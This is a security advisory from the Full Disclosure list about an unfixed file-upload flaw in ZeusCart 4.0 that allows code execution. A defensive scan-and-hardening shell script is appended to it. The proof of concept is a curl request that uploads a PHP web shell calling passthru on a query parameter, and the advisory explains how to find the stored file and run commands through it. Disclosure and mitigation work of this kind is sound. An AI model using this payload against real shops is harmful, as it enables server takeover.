ZeusCart 4.0: Code Execution
Security Advisory – Curesec Research Team

1. Introduction

Affected Product:    ZeusCart 4.0
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Contact:      supp...@zeuscart.com
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  08/13/2015
Disclosed to public: 09/14/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Vulnerability Description

The image upload for a new product does not restrict the type of file that is accepted. A file with a .php extension is stored under the web root with its original extension, so requesting it afterwards makes the server execute it. This gives code execution once an attacker has gained access to the backend, for example via SQL Injection, CSRF, or XSS. Please note that an admin account with the right to add products is needed.

3. Proof of Concept

curl -i -s -k -X 'POST' \
    -H 'Content-Type: multipart/form-data; boundary=--------1849257448' \
    -b 'PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \
    --data-binary $'----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0a18\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0a22\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"product_title\"\x0d\x0a\x0d\x0atest\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"desc\"\x0d\x0a\x0d\x0adesc\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"sku\"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"txtweight\"\x0d\x0a\x0d\x0a5\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"status\"\x0d\x0a\x0d\x0aon\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"ufile[0]\"; filename=\"test.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php \x0apassthru($_GET[\'x\']);\x0a\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"price\"\x0d\x0a\x0d\x0a6\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"msrp_org\"\x0d\x0a\x0d\x0a6\x0d\x0a----------1849257448\x0d\x0aContent-Disposition: form-data; name=\"soh\"\x0d\x0a\x0d\x0a7\x0d\x0a----------1849257448--\x0d\x0a' \
    'http://localhost/zeuscart-master/admin/index.php?do=productentry&action=insert'

The uploaded file will be located here:

http://localhost/zeuscart-master/images/products/YYYY-MM-DDHHMMSStest.php

The stored name is only the upload timestamp followed by the client-supplied filename, so no directory listing is needed to locate the file: the timestamp is known to the attacker to within a few seconds. Requesting the URL with ?x=<command> runs the command via passthru().

4. Solution

This issue was not fixed by the vendor. Until it is, operators should mitigate on their own side: accept only files whose content (not just the extension) is an image, store them under a server-generated name, and configure the web server so that nothing under images/products/ is ever passed to the PHP engine.

5. Report Timeline

08/13/2015 Informed Vendor about Issue (no reply)
09/07/2015 Reminded Vendor of release date (no reply)
09/14/2015 Disclosed to public

6. Blog Reference:

http://blog.curesec.com/article/blog/ZeusCart-40-Code-Execution-57.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
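Because the vendor shipped no fix, an operator running ZeusCart needs two things the advisory does not spell out: a way to check whether the product-image directory already holds a script like the one uploaded above, and a server-side rule that stops such a file from being executed even if it gets there. The script below is an added example written for this page; it is not code from Curesec or from the ZeusCart project. It assumes Apache 2.4 with AllowOverride enabled for the upload directory (an assumption; under nginx/php-fpm the .htaccess has no effect and an equivalent location rule is needed), and the paths and sample files in the usage and test are constructed for illustration.

```shell
# Added example (not from the Curesec advisory or the ZeusCart code base):
# find script files that ZeusCart's product-image upload may already have
# accepted, and stop Apache from executing anything in that directory.
# Assumes Apache 2.4 with AllowOverride enabled for the directory
# (assumption); under nginx/php-fpm the .htaccess is ignored.

# Print every regular file under $1 that (a) carries a PHP-family extension,
# including double extensions such as shell.php.jpg that an AddHandler-based
# mod_php setup still treats as PHP, or (b) contains a PHP open tag in its
# first 8 KiB, which catches image/PHP polyglots that pass a magic-byte check.
scan_uploads() {
    find "$1" -type f | while IFS= read -r f; do
        # Apache matches extensions case-insensitively, so compare lowercased.
        lower=$(printf '%s' "$f" | tr 'A-Z' 'a-z')
        case "$lower" in
            *.php|*.php.*|*.php[0-9]|*.phtml|*.phar|*.phps)
                echo "$f"
                continue
                ;;
        esac
        if head -c 8192 "$f" | grep -q -E '<\?(php|=)'; then
            echo "$f"
        fi
    done
}

# Number of suspicious files under $1 (handy for a cron job or a test).
count_suspicious() {
    scan_uploads "$1" | wc -l | tr -d ' '
}

# Write an .htaccess into $1 that refuses to serve PHP-family names at all
# (this works for both mod_php and php-fpm, since the request never reaches
# the handler) and, under mod_php, also switches the engine off for the
# directory. Ordinary image files are still served normally.
harden_upload_dir() {
    cat > "$1/.htaccess" <<'EOF'
<FilesMatch "\.ph(p[0-9]?|tml|ar|ps)(\.|$)">
    Require all denied
</FilesMatch>
<IfModule mod_php.c>
    php_flag engine off
</IfModule>
EOF
}

# Usage (paths are examples):
#   . ./upload_check.sh
#   scan_uploads /var/www/zeuscart-master/images/products
#   harden_upload_dir /var/www/zeuscart-master/images/products
```

The scan deliberately looks at content as well as names: a file such as poly.gif that begins with GIF89a and then carries `<?php` passes getimagesize()-style checks and is still executed if anything ever maps it to the PHP handler, so the .htaccess rule and the content scan cover different failure modes. Run the scan before hardening so the .htaccess itself is not in the listing, and treat any hit as an incident rather than just deleting the file.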